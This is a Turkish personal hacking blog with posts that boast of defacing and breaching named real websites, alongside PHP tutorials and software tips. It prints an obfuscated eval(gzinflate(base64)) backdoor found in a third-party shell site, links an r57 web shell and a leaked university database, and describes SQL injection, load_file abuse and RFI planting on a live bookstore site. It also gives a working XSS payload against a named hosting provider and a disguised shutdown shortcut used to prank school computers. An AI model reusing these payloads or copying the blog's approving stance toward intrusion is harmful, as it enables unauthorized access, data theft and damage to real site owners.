4 Tarafsız Hack Haber SiberBülten!

Merhaba sevgili blog ve sevgili okurlarım...

Pek işim olmaz ya arada heyk aleminde neler dönüyor kim kimi heykliyor kim kime kayıyor zaman öldürmek maksadıyla şöyle bir göz atıyorum...Bu akşam Siberbülten.net'e baktığımda "Thepoison.org (Shell Center) Online !" başlıklı bir haber gördüm yinemi hack sitesi diye habere tıkladım...Şunları yazmışlar;

Thepoison.org Shell Sitesi Online !

Entcounix önderliğinde içeriğinde bir çok shell barındıran Thepoison.org hizmete girmiştir. Logsuz oldugunu belirten ekip eğitim amaçlı çalısmalarında oldugunu belirttiler

İletişim: security@crack-h.com

Shellere baktığımda bütün shellerin altında bu kod yer alıyordu:

<?php eval(gzinflate(str_rot13(base64_decode('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')))); ?>

Piyasadaki diğer mallara göre biraz farklı bi şifreleme seçmişler :D ama kırmak hiçde zor değil...İşte decode edilmiş hali;

Buda loglara giriş panelleri:

http://attack-h.com/snf/log.php

Bu yazının aynısını siberbülten'e yorum olarak gönderdim tabiki farkettikleri gibi yorumu sildiler :D çünkü sitelerindeki gıydırık banner'da da yer aldığı gibi tarafsız değil TARAFLI haberden yanalar...

Bu tür loglu shell'ler hatta sırf bunun için açılan siteler sanalın en alt tabakasını oluşturan aciz insanların ürünüdür...

Neyse bunlar için bu kadar yazmak yeterde artar bile...Dikkatli olun böyle salaklara malzeme olmayın iyi akşamlar!

2 Blogum 1 Yaşında!

Bu aralar çok yoğunum, öyle yoğunum ki bloguma bakmak 1 haftadan sonra bugün aklıma geldi birkaç yorumu yayınladıktan sonra temayı değiştirme kararı aldım arşiv kısmına baktığımda blogumu 2008 eylülünde açmış olduğumu gördüm :) yani acısıyla tatlısıyla 1 yılı devirmişiz :) nice mutlu yıllara...

1 TTnet 8 Mbit

TTnet 8 mbit paketine ancak geçiş yapmış bulunmaktayım her ne kadar 8 mbit hızda 4 gb kota kullanmak saçma olsada yapıcak fazla bişi kalmıyor...

İşte TTnet hatırası :)



Bu arada Allah'a şu şekilde seslenmeden geçemiycem...

"Allahım beni 8 mbit'in rüzgarına kaptırıp 4* ile çarpma..."

*NET4 PAKET BKNZ...

10 Nedir Bu Hacklink Olayı

İllegal herhangi bir yöntemle pr değeri yüksek herhangi bir siteye kontrol yetkisi elde edilerek(kısaca hackleyerek ^^ ) hedef siteye kendi sitemizin kodlarını yerleştirmemizle başlar...

Örnek bir hacklink olayını vurgulamak gerekirse sistem şöyledir:

diziizlemax.com adlı sitenin uyanık sahibi http://www.nelc.edu.eg adlı siteye shell veya kul. adı ve şifre çalarak erişim sağlamış olmalı ki 8/10 pr değerindeki bu siteye backlink vermiştir.Yada diğer bir ihtimalide göze alırsak nelc.edu.eg sitesinin sahibi, diziizlemax.com sitesinin sahibinin askerlik arkadaşıdır, kankisidir işte ne biliyim herhangi bilmemnesidir hatır için sitesine bilerekten link vermiştir :P

Kanıtlamak gerekirse sitenin kaynak kodlarını açıp bakabilirsiniz:

En altta şu kodları görebilirsiniz:

<a style="font-size: 1pt; color: #f8f8f8" title="dizi izle" target="_blank" href="http://www.diziizlemax.com">dizi izle</a>

Gerçi bu kodların yanı sıra daha bir çok otlakçıyı daha görebilirsiniz ama neyse şimdi onlarada değinirek konuyu uzatmanın anlamı yok :P

Özellikle font size 1 punto ve yazı rengi sitenin arkaplan değerinde seçilmiştir ki hacklink yapılan site sahibi davayı çakmasın ;)

Ama bennn evet yardımsever ben hemen siteye insanlık namına aşağıdaki gibi bir uyarı gönderdim bile hahaha :D



Yakında bu işin daha profesyonel yöntemlerini sizlere ayrıntılı bir şekilde göstericem :D herşey insanlık namına herşey eğitim için...Sizler evet siz heykirlar yeterki içinizdeki şeytani ruhu öldürmeyin heyk ruhunu canlı tutun!

Saygılarımla UsluBey™

0 Kurdish-Net.com Hacked!

Site: Kurdish-Net.com

Mirror: http://www.zone-h.com/mirror/id/9026476

1 Security-Arge.com Online!

Sanalda tanıdığım en delikanlı insanlardan biri olan Reis'le açmaya karar verdiğimiz forumumuz Reis'in katkılarıyla online!

Açılışı şerefine bir adet şerefsiz sitesi hacklenmiştir.

Site: rociwan.com

Mirror: http://www.zone-h.org/mirror/id/9009526
Video: http://depo.security-arge.com/itler.rar

Destek maili olarak kullandıkları mail:

rociwanalikari@hotmail.com 0WNED!

1 Multi AV Scan 1.6.1

Online virüs taraması yaptıran sitelere benzeyen bilgisayarınıza kurabileceğiniz güzel bir virüs scanner buldum...Online sitelerden avantajı taratacağınız dosyayı upload etmeyişiniz doğal olarakda taratacağınız dosyanın bilgileri hiçbir yere iletilmiyor ;)

Program Bilgisi:
[+] Kodlayan: Gakh
[+] Versiyon: 1.6.1
[+] Tip: Scanner

Download:
[+] Part 1
[+] Part 2
[+] Update

1. ve 2. partı indirdikten sonra herhangi bir sürücünüzde (örn. D:\MultiScan) klasör oluşturun klasörün içerisine part 1 ve 2'yi çıkarın...Daha sonra programın en son versiyonunu içeren update'i indirerek onuda oluşturduğunuz klasörün içerine çıkarın...

0 Güzel Bir Mp3 İndirme Programı

Yeni tanıştığım tamamen türk yapımı olan bu program mp3 indirmede diğer programlara göre oldukça başarılı.

Sınırsız ve hızlı kullanım özelliği ile bilgisayarımda olmazsa olmaz programlar arasında çoktan yerini aldı :) Ayrıca en güzel özelliklerinden birisi portable olması yani flash diskinizde taşıyabilir istediğiniz bilgisayarda kullanabilirsiniz sadece 289 kb! Burdan indirebilirsiniz.

Programı bilgisayarınızda çalıştırabilmek için NetFramework 2.0'ın bilgisayarınızda kurulu olması gerekiyor onuda burdan indirebilirsiniz

1 University Of Luxembourg Owned

Servera olmıycak scriptleri sokarsanız olcağı budur :D Hele bi tanesi milattan önce kalma bir scriptti ki sağolsun beni içeri alanda o script oldu...

Site:
http://dl.emacs.uni.lu
http://profilage.uni.lu/html/

Mirror:
http://www.zone-h.org/mirror/id/8865720
http://www.zone-h.org/mirror/id/8872888

Database:
http://www.box.net/shared/hoah0668d2

1 Ev Halkı Bilgisayardan Nasıl Soğutulur

Merhaba arkadaşlar evinizdeki bilgisayarınızı kendinizden başka biriyle paylaşmak istemezsiniz değilmi bunlar gerek kardeşleriniz, gerek anne ve babanız, gerekse eşiniz olabilir :D

Hemen masaüstüne sağ tıklayarak kısayol oluştur diyoruz ve aşağıdaki parametreyi giriyoruz...

İleri diyoruz ve bizden bir dosya adı belirlemizi istiyor...Dosya adını Internet Explorer.exe yapıyoruz...Bütün bu adımları izledikten sonra masaüstünde kısayol oluşmuş olmalı ama ikon oldukça banâl yani kimse böle b.ktan bişeye tıklamaz kaldı ki mouse imlecini bile üzerinde gezdirmek istemez...Eee ne yapabiliriz? Evet evet, simgeyi değiştirebiliriz ;)

Yanda görülen şekilde ikonuda belirledik artık geriye masaüstünden gerçek internet explorer'ı kaldırmak ve yerine bunu koymak gerekiyor...

shutdown -s -t 0 parametresi windows'u kapatmaya yarar herhangi bir zararı yoktur sadece işin kısayola dökülmüş hali...

Lisede bilgisayar laboratuvarında denemiştim sırasıyla bütün bilgisayarlara 1'er dakikalık aralarla oturarak hepsine döşedim ve bir köşeye çekilip çaresizce internete girmeye çalışanları ama windows'un kapatıldığını görünce "Hocaaammm bu bilgisayarlara virüs girmişşşş...!" diye bağırarak hocayı çileden çıkaran sınıf arkadaşlarımı izledim halâ aklıma geldikçe gülerim ^^

Ve ne mi oldu? Sayemde bütün laboratuvarın bilgisayarları format yedi muHAhahAaA ^^

6 MySQL Injection Show :)

Merhaba arkadaşlar uzun bir aradan sonra güzel bir video ile tekrar karşınızdayım :)

SQL Injection'a yeni başladığım günden bu yana geçen sürede anladım ki bir siteye SQL Injection uygulamak gerçekten bir sanat ve çok zevkli bir iş :) Eğer içinizde biraz keşfetme ve hırs duygusu varsa çok büyük işler yapabilirsiniz...

Videoyu biraz açıklayacak olursam, online kitap satışı yapan bir siteyi hedef aldım...Açıkçası başta siteye shell sokmak aklımdan geçmedi, ilk önce mysql injection uygulayarak tüm adminlerin bilgilerini aldım tabi bunun yanında şansımın yaver gitmesiyle birçok e-mail hatta bir host+domain bile elime geçti :) Ama en küçük bir veri kaybına yada hesaba el koyma gibi birşey yapmadım.Benimkisi sadece yapabileceklerimi görme egosu galiba...

Aradan kısa bir zaman geçince aklıma birşey takıldı milw0rm'de "Rooting a linux box via MySQL Injection" adlı bir video izlemiştim çok ilgimi çeken bir videoydu videodaki yönteme ara ara göz gezdirdiğim SQL injection cheat sheet yazılarından aşinaydım...Ama herhangi bir siteye uygulamak açıkçası nasip olmamıştı :) Neden olmasın diyerek load_file() fonksiyonunu kullandım ve başarıyla çalıştı...Daha sonra önem taşıyan bazı site dosyalarını okudum...Ardından basit bir rfi açığı yaratarak işi bitirdim...Serverda yeni bir kernel kullandıkları için uygun local root exploiti bulamadım dolayısıyla root olamadım...Zaten 2 site barınıyordu işte onlar :P

http://www.zone-h.org/mirror/id/8776609
http://www.zone-h.org/mirror/id/8788915

• Videodaki Araçlar:

> r57 Shell : http://kopru6.co.cc/r57.txt

> text2hex : indir (36 Kb)

• Video Download:

> İndir (11 .9 Mb)

Lütfen Kaynak Göstererek Kullanınız! /UsluBey

4 Türkler Zone-h'yi Fethetti

Zone-h'nin açılışının ardından sitede artık türklerden başkasını göremez oldum...

Ondan bundan düşme serverlardaki b.oktan sitelere atılan amaçsız indexler, indexlerde yer alan küfürler, hakaretler zone-h nin kalitesini ayaklar altına alıyor bence...Yabancılarda haklı aslında adamlar baktı türklerin işi gücü yok sabah akşam zone kasıyor "Lanet olsun be! Alın sizin olsun!" der gibi ellerini ayaklarını çektiler siteden :D

2 satır kod bilmeyen ama r57, c99 listpathlerle yeşil perm arayarak site hacklemekle gün geçiren her türk genci hacker oldum derse bilişim yönünde pekde iyi bir geleceğe sahip olamayacağımız kesin...

Saygılarımla gözlerinizden öperim...
/UsluBey

0 Natro Web Hosting XSS

Natro Web Hosting Firması sitesinin domain check kısmında xss açığı olduğunu farkettim xssed.com'a submit ettim onaylanmasını bekliyorum...
İşte bulduğum açık:

http://whois.natro.com/index.php?DomainName="><script>alert(/XSSeD BY USLUBEY/)</script>

Sitede daha öncedende bulunmuş xss açıkları:
http://www.xssed.com/mirror/30330/
http://www.xssed.com/mirror/826/

0 Kontör Hırsızlarına Dikkat!

Bu yazıyı bugün emniyetten telefonuma gönderilen uyarı mesajı üzerine yazıyorum, dolandırıcılar bu sefer polis, jandarma gibi yetkili sıfatlara bürünerek kişilerden kontör talep ediyorlarmış...Nette biraz araştırma yapınca şu senaryoyu buldum:

BEN BAŞKOMİSERİM

"Kendisini başkomiser olarak tanıtan bir kişi aradı. Bu kişi bana cep telefonumdan albayın eşinin telefonuna taciz mesajları atıldığını söyledi. Bunun mümkün olamayacağını söyleyince, bana zaten internet üzerinden mesajların atıldığını, bunun ancak sim kartımı kullanarak yapabileceklerini ve o kişinin internette kullandığı şifreyi çözebilmek için 4 adet 250 kontör göndermem gerektiğini söyledi. Ben de hemen söylediği miktarda kontör alıp şifre ve seri numarasını bu kişiye verdim. Bunun üzerine bana, telefonumu kullanan kişinin adının Salih olduğunu, daha ayrıntılı bilgi için 8 adet 250 kontör daha almam gerektiğini söylediler. Bu kartları da alarak o kişilere gönderdim."

Eğer bu senaryo doğruysa bu devirde bu kadar saf bir insanın varlığı açıkcası beni korkutuyor :)

1 Oyunlardan Video Çekin

Yukarıdaki video cs ortağım Kicker tarafından çekilmiştir :) Video için teşekkürler Semih!

Recorder olarak Fraps adlı programı kullanıyoruz.Program normalde ücretli bir program ama merak etmeyin ben cr.acklenmiş sürümünü buldum, buradan indirebilirsiniz.Kullanımı gayet basit programı çalıştırın ve vidosunu çekmek istediğiniz oyuna girin kaydı başlatmak için F9 bitirmek için ise yine F9'a basmanız yeterli olacaktır...

İyi oyunlar!

2 Site Üzerinden RFI Tespiti

Site kodlarını masaya almadan online olarak rfi açıklarını yakalayabilirsiniz...Tanımlanmamış başıboş çağırılan variable'lar bu gibi basit güvenlik açıklarına sebeptir...

Videodada bu basit hatanın sitenin güvenliğini ne boyutta etkilediğini görüceksiniz...

Videoyu izlemek için buraya tıklayın.

0 PHP'de Değişkenin Değişkeni Kavramı

Değişkenin değişkeni kavramı hayli basit olmasına rağmen bir o kadarda egzantirik, ilginç bir kavram :) Çalışma mantığı şöyle bir değişkene değer atıyorsunuz daha sonra bu değişkene atadığınız string değeri karşımıza yepyeni bir değişken olarak çıkıyor...

Örnekle daha iyi anlaşılabilir;

<?php

/*
Değişkenin değişkeni kavramı
*/

$s1 = "s2";
$$s1 = "UsluBey"; // $s2 değeri değişken oldu & UsluBey değerini aldı!

echo "\$s1 değişkeninin değeri : $s1<br />";
echo "\$s1 değişkeninin değeri : ${$s1}<br />";
echo "\$s2 değişkeninin değeri ise : $s2<br />";

?>

Kodun ekran çıktısı bu olacak:

$s1 değişkeninin değeri : s2
$s1 değişkeninin değeri : UsluBey
$s2 değişkeninin değeri ise : UsluBey

5 Text To Hex Conversion Tool

Arada böyle şirin programlar yapmak hoşuma gidiyor :) Programın ne işe yaradığını sanırım anladınız...

Visual basic kullanarak hazırladım, SQL injection saldırılarında hexlemeniz gereken stringlerinizi artık bu programla hexlerseniz sevinirim ^^

Programı buradan indirebilirsiniz.

0 PHP Veri Türleri

Her programlama dilinde olduğu gibi php'de de bazı veri türleri mevcut...Bunlar şunlar:

• GENEL TÜRLER:

boolean : Logic - mantıksal veri türü ( true yada false )
integer : Tamsayı veri türü
float : Tamsayı
string : Alfanumerik veri türü(text)

Yukarıdaki veri türlerini sınamak isterseniz aşağıdaki gibi bir kod parçası yazabilir ve sonucu daha iyi anlayabilirsiniz:

<?php

$a = 32310; // integer
$b = 4.50; // double
$c = "UsluBey"; // string
$d = TRUE; // boolean

print gettype($a)."<br>";
print gettype($b)."<br>";
print gettype($c)."<br>";
print gettype($d)."<br>";

?>

• BİLEŞİK TÜRLER:

array : Dizi değişkenler
object : Nesneler

Dizi değişkenlerin kullanım türleri vardır bunlar şu şekildedir:

$dizi = array[anahtar] => deger;
$dizi[anahtar] = deger;
$dizi[] = deger;

Örnek kullanım:

<?php
    $yemekler = array ("ymk1"=>"Pilav",
                       "ymk2"=>"Tas Kebabı",
                       "ymk3"=>"Kuru Fasulye");

   echo $yemekler['ymk1'] . "<br>";
   echo $yemekler['ymk2'] . "<br>";
   echo $yemekler['ymk3'] . "<br>";

?>

Nesne türü değişkenler kendi içlerinde yani kendine özgü değişkenleri ve fonksiyonları olan türlerdir.

Örnek kullanım:

Örneğin kişi adı yazmaya yarayan bir nesne yazalım:

<?php

$Kisi_Adi = "UsluBey";

class kisi_adi
{
function kisi_adi_yaz($Kisi_Adi)
{
    echo "Adınız: ".$Kisi_Adi;
}
}

$nesne=new kisi_adi;
$nesne->kisi_adi_yaz($Kisi_Adi);

?>

• ÖZEL TÜRLER:

resource : Veritabanı bağlantısı gibi bilgiler
NULL : Boş bilgi

1 Bu Aralar PHP ve Ben

Yoğun çalışma tempomdan dolayı :) php öğrenme yolunda biraz tökezler gibi olsamda kafama koyduğum işi yapana kadar direnen biriyim bunun tam tersi bir şekilde istemediğim işide kimse yaptıramaz öhö öhöö her neyse konudan uzaklaşmayalım nerde kalmıştık evet php öğreniyorum diyordum...Bu aralar php'ye daha fazla vakit ayırarak kendimi geliştirmeliyim yani en azından bana 20 kağıda(+havale parası) mâl olan PHP ve AJAX kitabımın hakkını vermeliyim ^^

Açıkca konuşmak gerekirse öğrenirken nasıl bir yol izleyeceğim konusunda pek fikrim yok ama lise 2 de Visual Basic öğrenirken bol pratik yapılması gerektiğinin farkına vardım sanırım bundada böyle bir yol izlemem gerekiyor...Örnekleri blogumada yazmayı düşünüyorum böylece benle beraber hevesli başka arkadaşlarda yararlanabilir...

11 Blogger Syntax Highlighter Entegresi (Kod Renklendirici)

Bloggerda kodlarınızın kod editörlerdeki gibi renkli bir şekilde görünmesini istiyorsanız Syntax Highlighter'ı blogunuza entegre etmelisiniz...Bunun için blogunuzun Yerleşim > HTML'yi düzenle kısmından <head> tagını bulun hemen ardından şu kodları ekleyin:

<script src='http://shjs.sourceforge.net/sh_main.js' type='text/javascript'/>
<script src='http://shjs.sourceforge.net/lang/sh_cpp.js' type='text/javascript'/>
<script src='http://shjs.sourceforge.net/lang/sh_php.js' type='text/javascript'/>
<script src='http://shjs.sourceforge.net/lang/sh_javascript.js' type='text/javascript'/>
<script src='http://shjs.sourceforge.net/lang/sh_sql.js' type='text/javascript'/>
<script src='http://shjs.sourceforge.net/lang/sh_css.js' type='text/javascript'/>

Ben yukarıdaki dilleri entegre ettim eğer sizin tercihiniz farklıysa burada diğer dil dosyalarına ulaşabilirsiniz: http://shjs.sourceforge.net/lang/

Şimdi sıra css'yi eklemeye geldi bunun için kodlar arasından ]]></b:skin> kodunu bulun ve hemen üstüne şu css kodlarını yapıştırın:

pre.sh_sourceCode {
background-color: #eeeeee;
color: #000000;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_keyword {
color: #bb7977;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_type {
color: #8080c0;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_string {
color: #a68500;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_regexp {
color: #a68500;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_specialchar {
color: #ff00ff;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_comment {
color: #ff8000;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_number {
color: #800080;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_preproc {
color: #0080c0;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_symbol {
color: #ff0080;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_function {
color: #004466;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_cbracket {
color: #ff0080;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_url {
color: #a68500;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_date {
color: #bb7977;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_time {
color: #bb7977;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_file {
color: #bb7977;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_ip {
color: #a68500;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_name {
color: #a68500;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_variable {
color: #0080c0;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_oldfile {
color: #ff00ff;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_newfile {
color: #a68500;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_difflines {
color: #bb7977;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_selector {
color: #0080c0;
font-weight: normal;
font-style: normal;
}

pre.sh_sourceCode .sh_property {
color: #bb7977;
font-weight: bold;
font-style: normal;
}

pre.sh_sourceCode .sh_value {
color: #a68500;
font-weight: normal;
font-style: normal;
}

Son olarak <body> tagını <body onload="sh_highlightDocument();"> ile değiştirin.

Yazınıza örneğin php kodu eklerken şu şekilde ekleyin:

<pre class="sh_php">KODLAR</pre>

Diğer dil etiketleri için aşağıdaki tablodan yararlanabilirsiniz:

Language	HTML class
Bison	sh_bison
C	sh_c
C++	sh_cpp
C#	sh_csharp
ChangeLog	sh_changelog
CSS	sh_css
Desktop files	sh_desktop
Diff	sh_diff
Flex	sh_flex
GLSL	sh_glsl
Haxe	sh_haxe
HTML	sh_html
Java	sh_java
Java properties files	sh_properties
JavaScript	sh_javascript
JavaScript with DOM	sh_javascript_dom
LaTeX	sh_latex
LDAP files	sh_ldap
Log files	sh_log
LSM (Linux Software Map) files	sh_lsm
M4	sh_m4
Makefile	sh_makefile
Objective Caml	sh_caml
Oracle SQL	sh_oracle
Pascal	sh_pascal
Perl	sh_perl
PHP	sh_php
Prolog	sh_prolog
Python	sh_python
RPM spec files	sh_spec
Ruby	sh_ruby
S-Lang	sh_slang
Scala	sh_scala
Shell	sh_sh
SQL	sh_sql
Standard ML	sh_sml
Tcl	sh_tcl
XML	sh_xml
Xorg configuration files	sh_xorg

